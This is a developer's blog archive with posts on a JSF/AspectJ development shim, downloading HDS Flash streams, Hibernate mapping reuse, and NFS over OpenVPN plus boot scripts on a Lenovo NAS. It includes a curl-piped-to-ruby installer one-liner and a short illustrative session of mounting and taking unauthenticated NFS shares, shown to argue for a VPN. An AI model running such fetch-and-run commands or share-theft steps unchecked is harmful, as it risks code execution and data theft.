N1nja Hacks

~ Random assortment of solutions, sneaky hacks and technical HOWTOs

Author Archives: valblant

How to use JSF libraries without packaging them as JARs during development

Friday, 25 Sep 2015

Posted by valblant in JSF


Tags

JSF

Introduction

The JSF spec allows us to place JSF configuration documents, such as faces-config.xml and *.taglib.xml, either inside WEB-INF/ of our WAR or in META-INF/ of JARs included in WEB-INF/lib of our WAR. JSF annotated classes can likewise live either in WEB-INF/classes or in the included JARs.
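
For reference, here is roughly what the two supported layouts look like (a sketch; the artifact names are made up):

my-app.war
  WEB-INF/faces-config.xml              <- WAR-level JSF config
  WEB-INF/my-app.taglib.xml             <- WAR-level taglib
  WEB-INF/classes/...                   <- JSF annotated classes in the WAR itself
  WEB-INF/lib/my-jsf-lib.jar
      META-INF/faces-config.xml         <- config inside a dependency JAR
      META-INF/my-lib.taglib.xml        <- taglib inside a dependency JAR
      com/example/...                   <- JSF annotated classes inside the JAR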

But what if we want all of this to work properly without having to package our JSF dependency projects as JARs? Naturally, we never want to deploy like that, but during development it would be really nice, b/c then we could make changes to any code inside our JSF dependencies with full hot-swap support, without having to package anything or restart the application server! Unfortunately, this is not possible with JSF out of the box…

This article describes a technique I used to work around these limitations of JSF, thus gaining the ability to make direct modifications to my JSF libraries without restarting or repackaging, and achieving the state of coding zen :).

This solution was tested with Mojarra JavaServer Faces 2.1.7, and it is intended to work with Eclipse workspaces. There would probably be small differences in the implementation for other configurations, but the general approach should work everywhere.

Solution

We have 3 problems to solve:

1) Picking up JSF Annotated Classes from other JSF projects in the workspace

This turned out to be the hardest problem to solve.

Normally JSF annotated classes (such as @FacesComponent, @FacesConverter, @FacesRenderer, etc) must be inside a JAR, or in /WEB-INF/classes/. What we need is to pick up annotated classes from other Eclipse projects we depend on, which means that they need to be loaded from our Web Project’s classpath.

There is no way to extend JSF to do this, b/c everything inside AnnotationScanTask and ProvideMetadataToAnnotationScanTask is hard coded. In order to make the necessary changes, we’ll need some AspectJ magic.

The idea is to use Load Time Weaving to advise the call to JavaClassScanningAnnotationScanner.getAnnotatedClasses() and merge results from our own annotation scan with the results coming from the stock JSF implementation.

This can be achieved with a simple aspect, and some code to scan for annotated classes, which is the first part of our solution. I am using Google Reflections here to do the annotation scan inside the packages where I know my JSF libraries will be. Modify this for your own needs.

JsfConfigurationShimForEclipseProjectsAspect.aj:

/**
 * This is an AspectJ shim used to find more JSF annotated classes during the setup process. 
 * Normally, JSF configuration and JSF annotations are only processed on paths inside our own WAR, and from other jars.
 * However, in development mode we are interested in linking to DryDock dependencies as local Eclipse projects, rather than jars.
 * This shim provides a missing extension point, which scans the DryDock project classpath for JSF annotations.
 *
 * The other part of this solution is found in <code>EclipseProjectJsfResourceProvider</code>.
 *
 * Since we are weaving JSF, Load Time Weaving is required, which means that this aspect must be declared in <code>META-INF/aop.xml</code>.
 * Also, Tomcat must be started with:
 *
 * <pre>
 *  -javaagent:/fullpath/aspectjweaver-version.jar -classpath /fullpath/aspectjrt-version.jar
 * </pre>
 *
 * @see EclipseProjectJsfResourceProvider
 *
 * @author Val Blant
 */
public aspect JsfConfigurationShimForEclipseProjectsAspect {

	pointcut sortedFacesDocumentsPointcut() : execution(* ConfigManager.sortDocuments(..));
	after() returning (DocumentInfo[] sortedFacesDocuments): sortedFacesDocumentsPointcut() {
		System.out.println("\n ====== Augmented list of JSF config files detected with JsfConfigurationShimForEclipseProjectsAspect ====== ");
		for ( DocumentInfo doc : sortedFacesDocuments ) {
			System.out.println(doc.getSourceURI().toString());
		}
		System.out.println("\n");
	}

	pointcut getAnnotatedClassesPointcut(Set<URI> urls) : execution(* JavaClassScanningAnnotationScanner.getAnnotatedClasses(Set<URI>)) && args(urls);
	Map<Class<? extends Annotation>, Set<Class<?>>> around(Set<URI> urls): getAnnotatedClassesPointcut(urls)  {

		Map<Class<? extends Annotation>, Set<Class<?>>> oldMap = proceed(urls);
		Map<Class<? extends Annotation>, Set<Class<?>>> newMap = EclipseJsfDryDockProjectAnnotationScanner.getAnnotatedClasses();
		Map<Class<? extends Annotation>, Set<Class<?>>> mergedMap = new AnnotatedJsfClassMerger().merge(oldMap, newMap);

		return mergedMap;

	}
}

EclipseJsfDryDockProjectAnnotationScanner.java:

/**
 * Scans DryDock project classpath to find any JSF annotated classes. This scanner is activated by 
 * the <code>JsfConfigurationShimForEclipseProjectsAspect</code>, which requires Load Time Weaving.
 *
 * This class should only be used in development! It is part of a solution that allows us to run the app
 * against locally imported DryDocked projects.
 *
 * @see JsfConfigurationShimForEclipseProjectsAspect
 * @see EclipseProjectJsfResourceProvider
 *
 * @author Val Blant
 */
public class EclipseJsfDryDockProjectAnnotationScanner extends AnnotationScanner {
	
	private static final Log log = LogFactory.getLog(EclipseJsfDryDockProjectAnnotationScanner.class);
	
	
	
	private static Reflections reflections = new Reflections( 
			new ConfigurationBuilder()
				.addUrls(ClasspathHelper.forPackage("ca.gc.agr.common.web.jsf"))
				.addUrls(ClasspathHelper.forPackage("ca.ibm.web"))
	);


	public EclipseJsfDryDockProjectAnnotationScanner(ServletContext sc) {
		super(sc);
	}
	
	
	public static Map<Class<? extends Annotation>, Set<Class<?>>> getAnnotatedClasses() {
		Map<Class<? extends Annotation>, Set<Class<?>>> annotatedClassMap = new HashMap<>();
		
		for ( Class<? extends Annotation> annotation : FACES_ANNOTATION_TYPE ) {
			Set<Class<?>> annotatedClasses = reflections.getTypesAnnotatedWith(annotation);
			
			if ( !annotatedClasses.isEmpty() ) {
				Set<Class<?>> classes = annotatedClassMap.get(annotation);
				if ( classes == null ) {
					classes = new HashSet<Class<?>>();
					annotatedClassMap.put(annotation, classes);
				}
				
				classes.addAll(annotatedClasses);
			}
		}
		
		log.info(" ====== Found additional JSF annotated classes from Eclipse classpath ====== \n" + annotatedClassMap);
		
		return annotatedClassMap;
	}

	@Override
	public Map<Class<? extends Annotation>, Set<Class<?>>> getAnnotatedClasses(Set<URI> urls) {
		return getAnnotatedClasses();
	}

}

AnnotatedJsfClassMerger.java:

/**
 * Merges 2 maps of JSF annotated classes into one map.
 * 
 * This class should only be used in development! It is part of a solution that allows us to run the app
 * against locally imported DryDocked projects.
 * 
 * @see JsfConfigurationShimForEclipseProjectsAspect
 * @see EclipseProjectJsfResourceProvider
 *
 * @author Val Blant
 */
public class AnnotatedJsfClassMerger {
	
	public Map<Class<? extends Annotation>, Set<Class<?>>> merge(
				Map<Class<? extends Annotation>, Set<Class<?>>> oldMap,
				Map<Class<? extends Annotation>, Set<Class<?>>> newMap) {
		
		
		Set<Class<? extends Annotation>> annotations = new HashSet<>();
		annotations.addAll(oldMap.keySet());
		annotations.addAll(newMap.keySet());
		
		Map<Class<? extends Annotation>, Set<Class<?>>> mergedMap = new HashMap<>();
		for ( Class<? extends Annotation> annotation : annotations ) {
			Set<Class<?>> classes = new HashSet<>();
			
			Set<Class<?>> oldClasses = oldMap.get(annotation);
			Set<Class<?>> newClasses = newMap.get(annotation);
			
			if ( oldClasses != null ) classes.addAll(oldClasses);
			if ( newClasses != null ) classes.addAll(newClasses);
			
			mergedMap.put(annotation, classes);
		}
		
		return mergedMap;
	}

}

Next, we need to properly set up the Load Time Weaver.

First we create src/main/resources/META-INF/aop.xml in our Web Project.

META-INF/aop.xml:

<!--
  This file is read by the AspectJ weaver java agent. Make sure you specify the following on the server startup command line:
    -javaagent:/fullpath/AgriShare/aspectjweaver-version.jar -classpath /fullpath/AgriShare/aspectjrt-version.jar
  Also, make sure that you actually compile the aspects specified below. Eclipse can't do it! You'll have to use Gradle for that.
-->

<aspectj>
 <aspects>
   <aspect name="ca.gc.pinss.web.jsf.drydock.eclipse.JsfConfigurationShimForEclipseProjectsAspect"/>
 </aspects>
 <weaver options="-verbose -showWeaveInfo -XnoInline">
 	<include within="com.sun.faces.config.*"/>
 </weaver>
</aspectj>

Now we need to make sure that we start our application with the AspectJ weaver.

  • Append the following to your Application Server’s startup JVM parameters:
-javaagent:/home/val/.gradle/caches/modules-2/files-2.1/org.aspectj/aspectjweaver/1.7.4/d9d511e417710492f78bb0fb291a629d56bf4216/aspectjweaver-1.7.4.jar

Note: Use the correct path for your machine!

  • Make sure that this jar is first on your Application Server’s classpath:
/home/val/.gradle/caches/modules-2/files-2.1/org.aspectj/aspectjrt/1.7.4/e49a5c0acee8fd66225dc1d031692d132323417f/aspectjrt-1.7.4.jar

Note: Use the correct path for your machine!

And that’s it – now your annotated JSF classes will be picked up directly from project classpath!

To make sure that it is working, look for messages from EclipseJsfDryDockProjectAnnotationScanner in the log. It will have the following heading:

 ====== Found additional JSF annotated classes from Eclipse classpath ======

You should also see some messages from the AspectJ weaver:

[WebappClassLoader@6426a58b] weaveinfo Join point 'method-execution(
com.sun.faces.config.DocumentInfo[] com.sun.faces.config.ConfigManager.sortDocuments(com.sun.faces.config.DocumentInfo[], com.sun.faces.config.FacesConfigInfo))'
in Type 'com.sun.faces.config.ConfigManager' (ConfigManager.java:503) 
advised by afterReturning advice from 'ca.gc.pinss.web.jsf.drydock.eclipse.JsfConfigurationShimForEclipseProjectsAspect' (JsfConfigurationShimForEclipseProjectsAspect.aj:36)
[WebappClassLoader@6426a58b] weaveinfo Join point 'method-execution(
java.util.Map com.sun.faces.config.JavaClassScanningAnnotationScanner.getAnnotatedClasses(java.util.Set))' 
 in Type 'com.sun.faces.config.JavaClassScanningAnnotationScanner' (JavaClassScanningAnnotationScanner.java:121) 
 advised by around advice from 
'ca.gc.pinss.web.jsf.drydock.eclipse.JsfConfigurationShimForEclipseProjectsAspect' (JsfConfigurationShimForEclipseProjectsAspect.aj:45)

2) Picking up Taglibs from other JSF Projects in the Workspace

This one is easy in comparison.

All we need to do here is to specify an additional custom FacesConfigResourceProvider.

EclipseProjectJsfResourceProvider.java:

/**
 * This custom resource provider is used for finding JSF Resources located in other Eclipse Projects, rather 
 * than jars. JSF spec does not support this, but it is very useful for running DryDocked projects inside the local Eclipse workspace.
 *
 * In order to enable this resource provider, this class's name must be specified in 
 * <code>META-INF/services/com.sun.faces.spi.FacesConfigResourceProvider</code>.
 *
 * <b>NOTE:</b> The Gradle build will not include the com.sun.faces.spi.FacesConfigResourceProvider file, b/c we never want this 
 * customization to be deployed - it's for development only.
 * 
 * @see JsfConfigurationShimForEclipseProjectsAspect
 *
 * @author Val Blant
 */
public class EclipseProjectJsfResourceProvider implements FacesConfigResourceProvider {
	
	private static final Log log = LogFactory.getLog(EclipseProjectJsfResourceProvider.class);
	
	
	
	@Override
	public Collection<URI> getResources(ServletContext context) {
		
		List<URI> unsortedResourceList = new ArrayList<URI>();

        try {
            for (URI uri : loadURLs(context)) {
            	if ( !uri.toString().contains(".jar!/") ) {
                   unsortedResourceList.add(0, uri);
            	}
            }
        } catch (IOException e) {
            throw new FacesException(e);
        }

        List<URI> result = new ArrayList<>();
        
        // Then load the unsorted resources
        result.addAll(unsortedResourceList);
        
		log.info(" ====== Found additional JSF configuration resources on Eclipse classpath ====== \n" + result);

        return result;
	}
	
	
    private Collection<URI> loadURLs(ServletContext context) throws IOException {

        Set<URI> urls = new HashSet<URI>();
        try {

// Turns out these are already grabbed by MetaInfFacesConfigResourceProvider, so we don't need to do it again	
//            for (Enumeration<URL> e = Util.getCurrentLoader(this).getResources("META-INF/faces-config.xml"); e.hasMoreElements();) {
//                    urls.add(new URI(e.nextElement().toExternalForm()));
//            }
            URL[] urlArray = Classpath.search("META-INF/", ".taglib.xml");
            for (URL cur : urlArray) {
                urls.add(new URI(cur.toExternalForm()));
            }
        } catch (URISyntaxException ex) {
            throw new IOException(ex);
        }
        return urls;
        
    }
	

}

To register this provider, we add the following into our Web Project:

src/main/resources/META-INF/services/com.sun.faces.spi.FacesConfigResourceProvider:

ca.gc.agr.common.web.jsf.drydock.eclipse.EclipseProjectJsfResourceProvider

Note: Use the correct package name for your project!

3) Picking up Facelet Includes and Resources from other JSF Projects in the Workspace

This one is also easy.

We create a custom Facelets ResourceResolver.

ClasspathResourceResolver.java:

/**
 * This is a special Facelets ResourceResolver, which allows us to ui:include resources from
 * the classpath, rather than from jars. This is necessary for the Incubator to see stuff
 * in other projects under META-INF/resources/ 
 * 
 * @author Val Blant
 */
public class ClasspathResourceResolver extends DefaultResourceResolver {
	/**
	 * First check the context root, then the classpath
	 */
    public URL resolveUrl(String path) {
        URL url = super.resolveUrl(path);
        if (url == null) {
            
            /* classpath resources don't start with /, so this must be a jar include. Convert it to classpath include. */
            if (path.startsWith("/")) {
                path = "META-INF/resources" + path;
            }
            url = Thread.currentThread().getContextClassLoader().getResource(path);
        }
        return url;
    }
}

Now we register it in our web.xml:

	<!-- This allows us to "ui:include" resources from the classpath, rather than from jars, which is important for working with DryDocked projects directly from our Eclipse workspace -->
	<context-param>
		<param-name>facelets.RESOURCE_RESOLVER</param-name>
		<param-value>ca.gc.agr.common.web.jsf.ClasspathResourceResolver</param-value>
	</context-param>	
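
With the resolver registered, a page in the Web Project can now ui:include a fragment that lives in a dependency project under META-INF/resources/, exactly as if it were still packaged in a JAR. The path below is hypothetical:

<!-- Resolved first against the WAR's context root, then (by our resolver) against
     META-INF/resources/ on the classpath, e.g. a dependency project's
     src/main/resources/META-INF/resources/common/header.xhtml -->
<ui:include src="/common/header.xhtml" />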

And that’s it! We now have everything we need to load all JSF resources from Eclipse projects instead of JARs.

Eclipse Project Setup

All that remains is to reconfigure the Eclipse workspace to start using our new capabilities.

  1. Import your JSF library projects and all their dependencies into your Eclipse workspace together with the Web Application you are working on.
  2. Go to all projects that have dependencies on common component jars, delete the jar dependencies, and replace them with project dependencies that are now in your workspace.
  3. Get rid of any test related project exports from the library projects that might interfere with the running of the app. This may not be necessary depending on your configuration.
  4. Configure your Application Server classpath to use the Eclipse Projects instead of JARs.
  5. Configure your build scripts to turn off these modifications, so they don’t get deployed anywhere past your development machine. This is as simple as not including META-INF/services/com.sun.faces.spi.FacesConfigResourceProvider and META-INF/aop.xml in your WAR.
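
For the last step, the exact mechanism depends on your build. With Gradle it can be as simple as excluding the two files from the War task. This is only a sketch, not taken from the project's actual build script, so verify the contents of the resulting WAR yourself:

war {
    // Development-only JSF shims must never ship in a deployable WAR
    exclude '**/META-INF/aop.xml'
    exclude '**/META-INF/services/com.sun.faces.spi.FacesConfigResourceProvider'
}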

And that’s it.

How to Save HDS Flash Streams from any web page

Thursday, 29 Jan 2015

Posted by valblant in video


Tags

flash, Flash video, HDS

I came across a Flash video that I was not able to save with any Video Downloader app, including the ones that actually sniff traffic on your network adapter, such as Replay Media Catcher and many others.

Turns out that this particular page was using the new Adobe HTTP Dynamic Streaming (HDS) technology. With HDS, the original MP4 or FLV file is split up into many F4F segments, which are then served to the media player on the page one after the other, so there is no single video file to download like with most other video streaming technologies.

You can easily check if HDS is being used by using Firefox to watch the video.

  1. Clear Firefox cache (Tools -> Options -> Network, Clear Cached Web Content, Clear User Data)
  2. Load the page with the video
  3. Open a new tab and browse to about:cache?storage=disk
  4. Search for a bunch of files that have the word ‘Frag’ in them. They’ll look something like this:
http://ams-vp11.9c9media.com/hds-vod/ae/2015-01-29/3FA6DB15557BA5F0/CTVNews-546418-29-WPG-WEBPARKOUR08-SOT-Adaptive_08.mp4Seg1-Frag39 
http://ams-vp11.9c9media.com/hds-vod/ae/2015-01-29/3FA6DB15557BA5F0/CTVNews-546418-29-WPG-WEBPARKOUR08-SOT-Adaptive_08.mp4Seg1-Frag38 
http://ams-vp11.9c9media.com/hds-vod/ae/2015-01-29/3FA6DB15557BA5F0/CTVNews-546418-29-WPG-WEBPARKOUR08-SOT-Adaptive_08.mp4Seg1-Frag37 
http://ams-vp11.9c9media.com/hds-vod/ae/2015-01-29/3FA6DB15557BA5F0/CTVNews-546418-29-WPG-WEBPARKOUR08-SOT-Adaptive_08.mp4Seg1-Frag36

These are all the F4F fragments of the video. You could download them all and combine them together, but that’s not the best way to do this.

There is a script called AdobeHDS.php, which can automate the download process for you if you provide it with the F4M Manifest for the stream. You can download the script from https://github.com/K-S-V/Scripts

This manifest file is easy to obtain, b/c it is delivered via a plain GET request that is issued before the video starts playing. To find the URL:

  1. Open Firefox Console (Ctrl+Shift+K) or Tools -> Web Developer -> Web Console
  2. Make sure that “Net” filter is selected
  3. Clear the Console
  4. Open the video page and let the video load
  5. In the Filter text box type “f4m” and you should now see a few F4M requests. You want the first one, which will probably be called “manifest.f4m“. Mine looked like this:
GET http://capi.9c9media.com/destinations/ctvnews_web/platforms/desktop/contents/540901/contentpackages/546418/stacks/1130329/manifest.f4m

Now just run the script with the manifest URL and you should get the re-combined flv file:

$ php AdobeHDS.php --delete --manifest "http://capi.9c9media.com/destinations/ctvnews_web/platforms/desktop/contents/540901/contentpackages/546418/stacks/1130329/manifest.f4m"
 KSV Adobe HDS Downloader

Processing manifest info.... 
Quality Selection: 
 Available: 2048 1856 1536 1280 896 640 480 299
 Selected : 2048 
Fragments Total: 55, First: 1, Start: 1, Parallel: 8 
Downloading 55/55 fragments 
Found 55 fragments 
Finished

You should now have an FLV file waiting for you in the script directory.
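
If you would rather end up with an MP4, the FLV can usually be remuxed without re-encoding, since HDS streams are typically H.264/AAC (an assumption; if ffmpeg complains about the codecs, drop the "-c copy" and let it transcode). Replace downloaded.flv with whatever file the script produced:

$ ffmpeg -i downloaded.flv -c copy downloaded.mp4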

For Mac Users

Posting some info from a comment by Eric L. Pheterson below:

To add a few more baby steps (for Mac users) :

  • When you view the AdobeHDS.php file at Sourceforge, copy/paste it into a file, and name it AdobeHDS.php
  • PHP should already be installed on your Mac
  • A dependency of AdobeHDS is not installed, so in Terminal run :
brew install homebrew/php/php55-mcrypt
  • After installing mcrypt, you must open a new terminal window or tab to use it
  • If you don’t have brew installed, in Terminal run :
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
  • After installing brew, run
brew update
  • This Firefox extension will perfectly present you with the php command you need : https://addons.mozilla.org/en-US/firefox/addon/hds-link-detector/

How to build a WebRTC Controlled RC Car

Tuesday, 23 Sep 2014

Posted by valblant in Android


Tags

android, webrtc

The Creeper Drone was created from a cheap RC truck, which I modified with an Android phone and a Raspberry Pi, so it can now be driven over a WiFi network from any browser that supports WebRTC. The Creeper transmits a video stream, allowing the driver to control it from a remote location. Bi-directional audio is also supported, giving the driver the ability to converse through the Creeper.

This post was more convenient to do as an Instructable, so you can find all the details about the hardware and software, including source code and 3D Models here:

http://www.instructables.com/id/WebRTC-Creeper-Drone-Browser-Controlled-RC-Car/

Video: https://www.youtube.com/watch?v=fUkK5v_VtI0

Hibernate XML Mapping Fragment Re-use

Friday, 19 Sep 2014

Posted by valblant in Hibernate


Tags

Hibernate

Hibernate mapping files are a frequent source of code duplication. For example, let’s say that all your database tables contain the same set of audit columns. Why should you have to repeat that declaration in every single mapping file? Or maybe you have similarly structured tables with different names, which is also a good opportunity for reuse.

It is possible to reuse the same Hibernate XML mapping snippet from other mapping files by utilizing XML entities.

XML snippet in ca/gc/agr/common/jms/domain/portal/PortalEventMessage.xml:

<!-- This fragment is included from another hbm -->

	<version name="lockSeqNum" type="int" column="LOCK_SEQ_NUM" />
	
	<property name="partyId" type="string" column="PARTY_ID" length="20" not-null="true" />
	<property name="fromAppNameEnglish" type="string" column="SOURCE_SYSTEM_NAME_ENG" length="100" not-null="true"  />        
	<property name="fromAppNameFrench" type="string" column="SOURCE_SYSTEM_NAME_FR" length="100" not-null="true" />
	
        ... etc ...
	
	<property name="createdDtm" type="timestamp" column="CREATED_DTM" />
	<property name="createdUserOid" type="long" column="CREATED_USER_OID" />
	<property name="updatedDtm" type="timestamp" column="UPDATED_DTM" />
	<property name="updatedUserOid" type="long" column="UPDATED_USER_OID" />

Hibernate mapping:

<?xml version="1.0"?>
<!DOCTYPE hibernate-mapping SYSTEM "http://www.hibernate.org/dtd/hibernate-mapping-3.0.dtd" [
    <!ENTITY commonMapping SYSTEM "classpath://ca/gc/agr/common/jms/domain/portal/PortalEventMessage.xml">
    ]>

<hibernate-mapping>

    <class name="ca.gc.agr.common.jms.domain.portal.PortalEventMessage" table="PIN_PORTAL_EVENT" dynamic-update="true">

        <id name="oid" type="long" column="PORTAL_EVENT_OID" unsaved-value="0">
            <generator class="sequence">
                <param name="sequence">pin_portal_event_seq</param>
            </generator>
        </id>

		&commonMapping;

    </class>
    
</hibernate-mapping>

Make sure that the XML snippet is on the classpath and you are done.

Secure NFS Shares on Lenovo ix2-dl NAS

Thursday, 27 Feb 2014

Posted by valblant in NAS


Tags

NAS, VPN

Introduction

ix2-dl offers many ways to connect to it, but none of them can provide such a seamless experience for Linux computers as NFS:

(Screenshot: the ix2-dl's list of supported connection protocols)

The problem with NFS is that without a Domain Controller somewhere on the LAN that can provide Kerberos authentication, NFS is horribly insecure. All you have to do to infiltrate the storage is somehow connect to the LAN. Once you are in, it is trivial to steal everything from unauthenticated NFS shares.
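
To illustrate just how trivial: any machine that manages to get on the LAN can list and mount the exports (a hypothetical session; the share name is made up):

$ showmount -e nas
Export list for nas:
/nfs/backups *

$ sudo mount -t nfs nas:/nfs/backups /mnt/loot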

Samba 4

It is possible to set up Samba4 as a Domain Controller that will provide Active Directory and Kerberos services:

http://sector7e.com/setup-of-samba4-4-10-on-ubuntu-server-12-04-lts-and-13-10/
http://wiki.samba.org/index.php/Samba4/HOWTO
https://help.ubuntu.com/community/Kerberos

Unfortunately, the setup procedure is not trivial, and it would have complicated my infrastructure more than I was willing to accept.

Windows File Sharing (CIFS)

CIFS shares are attractive, b/c they have built-in password authentication. I tried using CIFS mounts, but quickly rejected the idea b/c the shares were much slower than NFS, did not allow symlinks, and did not allow fine-grained ownership control of files under one share.

OpenVPN

This ended up being the best and simplest option that allows me to have complete and seamless integration of my shares and best possible security.

The idea is to turn off all security on the NFS shares (even enabling no_root_squash), and then export them exclusively over the VPN subnet. Here’s an example, with an additional read-only export for the local wired net:

(Screenshot: the NFS export configuration for the shares)
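
Expressed as plain /etc/exports entries, the configuration in the screenshot would look roughly like this (a sketch only: the VPN subnet matches the OpenVPN config below, and the 192.168.1.0/24 wired subnet is an assumption):

# Read-write, no squashing, but only over the VPN; read-only for the wired LAN
/nfs/music   192.168.129.0/255.255.255.224(rw,async,no_root_squash,no_subtree_check) 192.168.1.0/24(ro,no_subtree_check)
/nfs/video   192.168.129.0/255.255.255.224(rw,async,no_root_squash,no_subtree_check) 192.168.1.0/24(ro,no_subtree_check)
/nfs/work    192.168.129.0/255.255.255.224(rw,async,no_root_squash,no_subtree_check)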

OpenVPN Setup

Before you can follow these instructions, you must first enable SSH access to the NAS, connect to package repositories and tie into the boot process. All of this is described in my previous posts:

https://n1njahacks.wordpress.com/2014/02/25/ssh-access-to-lenovo-ix2-dl-nas/
https://n1njahacks.wordpress.com/2014/02/27/setting-up-mysql-server-on-lenovo-ix2-dl-nas/

Install OpenVPN package and dependencies:

# ipkg install openvpn

Open /opt/etc/init.d/S20openvpn:

  • Comment out the tunnel driver insertion and the “return 0” line. It’s important that this script does not try to insert the module, b/c the tun module is already compiled into the kernel on this distro
  • Specify the correct file name for --config (lan-server.conf)

Add the startup script to /etc/rc.local:

# Start OpenVPN
echo 'Starting OpenVPN server...'
/opt/etc/init.d/S20openvpn

Note: in order for this to work, you must first modify the distro’s boot process as described in the MySQL server post linked above (see its “Custom Boot Scripts” section).

OpenVPN Server Configuration

I will provide my config as an example.

/opt/etc/openvpn/lan-server.conf:

# Configure server mode and supply a VPN subnet
# for OpenVPN to draw client addresses from.
# The server will take 192.168.129.1 for itself,
# the rest will be made available to clients.
# Each client will be able to reach the server
# on 192.168.129.1
#
server 192.168.129.0 255.255.255.224

daemon

# Which TCP/UDP port should OpenVPN listen on?
port 1194

# TCP or UDP server?
;proto tcp
proto udp

# By increasing the MTU size of the tun adapter and by disabling
# OpenVPN's internal fragmentation routines the throughput can be
# increased quite dramatically. The reason behind this is that by
# feeding larger packets to the OpenSSL encryption and decryption
# routines the performance will go up. The second advantage of not
# internally fragmenting packets is that this is left to the operating
# system and to the kernel network device drivers.
tun-mtu 9000
fragment 0
mssfix 0

# "dev tun" will create a routed IP tunnel,
dev tun0

# SSL/TLS root certificate (ca), certificate
# (cert), and private key (key).  Each client
# and the server must have their own cert and
# key file.  The server and all clients will
# use the same ca file.
#
# See the "easy-rsa" directory for a series
# of scripts for generating RSA certificates
# and private keys.  Remember to use
# a unique Common Name for the server
# and each of the client certificates.
#
# Any X509 key management system can be used.
# OpenVPN can also use a PKCS #12 formatted key file
# (see "pkcs12" directive in man page).
ca /etc/ssl/certs/VACE-LAN-CA-Chain.crt
cert /etc/ssl/certs/nas-lan-server.crt
key /etc/ssl/private/nas.key

# Diffie hellman parameters.
# Generate your own with:
#   openssl dhparam -out dh1024.pem 1024
dh /etc/ssl/private/dh1024.pem

# Maintain a record of client  virtual IP address
# associations in this file.  If OpenVPN goes down or
# is restarted, reconnecting clients can be assigned
# the same virtual IP address from the pool that was
# previously assigned.
ifconfig-pool-persist /opt/var/openvpn/lan-ipp.txt

# The keepalive directive causes ping-like
# messages to be sent back and forth over
# the link so that each side knows when
# the other side has gone down.
# Ping every 10 seconds, assume that remote
# peer is down if no ping received during
# a 120 second time period.
keepalive 10 120

# Enable compression on the VPN link.
# If you enable it here, you must also
# enable it in the client config file.
comp-lzo

# The maximum number of concurrently connected
# clients we want to allow.
max-clients 3

# It's a good idea to reduce the OpenVPN
# daemon's privileges after initialization.

# The persist options will try to avoid
# accessing certain resources on restart
# that may no longer be accessible because
# of the privilege downgrade.
persist-key
persist-tun

# Output a short status file showing
# current connections, truncated
# and rewritten every minute.
status /opt/var/openvpn/lan-status.log

# By default, log messages will go to the syslog (or
# on Windows, if running as a service, they will go to
# the "\Program Files\OpenVPN\log" directory).
# Use log or log-append to override this default.
# "log" will truncate the log file on OpenVPN startup,
# while &quot;log-append&quot; will append to it.  Use one
# or the other (but not both).
;log         openvpn.log
log-append  /opt/var/openvpn/lan-server.log
writepid    /opt/var/openvpn/lan-server.pid

# Set the appropriate level of log
# file verbosity.
#
# 0 is silent, except for fatal errors
# 4 is reasonable for general usage
# 5 and 6 can help to debug connection problems
# 9 is extremely verbose
verb 4

# Silence repeating messages.  At most 20
# sequential messages of the same message
# category will be output to the log.
mute 20

Pay close attention to the comment on tun-mtu. These settings significantly speed up the tunnel.

OpenVPN Client Configuration

/etc/openvpn/nas-client.conf:

daemon

client

remote nas

dev tun

port 1194
proto udp

# By increasing the MTU size of the tun adapter and by disabling
# OpenVPN's internal fragmentation routines the throughput can be
# increased quite dramatically. The reason behind this is that by
# feeding larger packets to the OpenSSL encryption and decryption
# routines the performance will go up. The second advantage of not
# internally fragmenting packets is that this is left to the operating
# system and to the kernel network device drivers.
tun-mtu 9000
fragment 0
mssfix 0

log-append  /var/log/openvpn/nas-client.log

# Downgrade privileges after initialization (non-Windows only)
user nobody
group nogroup

# Try to preserve some state across restarts.
persist-key
persist-tun

# SSL/TLS parms.
# See the server config file for more
# description.  It's best to use
# a separate .crt/.key file pair
# for each client.  A single ca
# file can be used for all clients.
ca /etc/ssl/certs/VACE-LAN-CA-Chain.crt
cert /etc/ssl/certs/boss-lan-client.crt
key /etc/ssl/private/boss.key

# Enable compression on the VPN link.
# Don't enable this unless it is also
# enabled in the server config file.
comp-lzo

# Set log file verbosity.
verb 4

# Silence repeating messages
mute 20

Mounting NFS shares

That’s pretty much it! Now you can mount the NFS shares from the client like so:
/etc/fstab:

nas_tunnel:/nfs/music    /mnt/nas/music     nfs     rw,auto    0       0
nas_tunnel:/nfs/video    /mnt/nas/video     nfs     rw,auto    0       0
nas_tunnel:/nfs/programs /mnt/nas/programs  nfs     rw,auto    0       0
nas_tunnel:/nfs/work     /mnt/nas/work      nfs     rw,auto    0       0
nas_tunnel:/nfs/pictures /mnt/nas/pictures  nfs     rw,auto    0       0

Where nas_tunnel = 192.168.129.1
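
The nas_tunnel name is simply an alias for the server’s VPN address, e.g. via an /etc/hosts entry on the client:

192.168.129.1    nas_tunnel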

Tunnel Performance Tuning

https://community.openvpn.net/openvpn/wiki/Gigabit_Networks_Linux

Setting up MySQL server on Lenovo ix2-dl NAS

Thursday, 27 Feb 2014

Posted by valblant in NAS


Tags

MySQL server, NAS

This article will explain how to install a MySQL server on the Lenovo ix2-dl NAS. It will also demonstrate how to customize the boot process.

This MySQL server will be set up as the back-end for my MediaWiki installation running on a different server.

Enable SSH Access

https://n1njahacks.wordpress.com/2014/02/25/ssh-access-to-lenovo-ix2-dl-nas/

Basic Config

Add the following to /etc/profile:

alias ls='ls --color'

# Set the locale properly
export LANG=en_US.utf8
export LANGUAGE=en_US:en

The locale settings were necessary to properly display Russian file names from a Terminal.

Custom Boot Scripts

One of the difficulties with this box is that it does not respect the startup scripts in /etc/rc* directories, even though they are there. Instead boot processes are managed by appmd, which uses an XML config file found here: /usr/local/cfg/sohoProcs.xml. Unfortunately, you can’t modify that file directly.

The /usr directory is actually part of the /boot/images/apps image mounted on /mnt/apps, so if we want to add anything to the startup config, we must modify the image itself.

Here are some scripts to help with that:

/opt/editconfig.sh:

#!/bin/sh
# edit the bootup config of the ix2
# inspired by http://www.chrispont.co.uk/2010/10/allow-startup-daemons-on-storcenter-ix2-200-nas/
# modified from http://techmonks.net/installing-transmission-and-dnsmasq-on-a-nas/
mknod -m0660 /dev/loop3 b 7 3
chown root.disk /dev/loop3
mkdir /tmp/apps
mount -o loop /boot/images/apps /tmp/apps
vi /tmp/apps/usr/local/cfg/sohoProcs.xml
sleep 1
umount /tmp/apps
rm /dev/loop3

/opt/init-opt.sh:

#!/bin/sh
# modified from http://techmonks.net/installing-transmission-and-dnsmasq-on-a-nas/

rm /opt/init-opt.log
echo "Last bootup:" >> /opt/init-opt.log
date >> /opt/init-opt.log
#Add your command below
/etc/init.d/rc.local start >> /opt/init-opt.log
while true; do
        sleep 1d
done

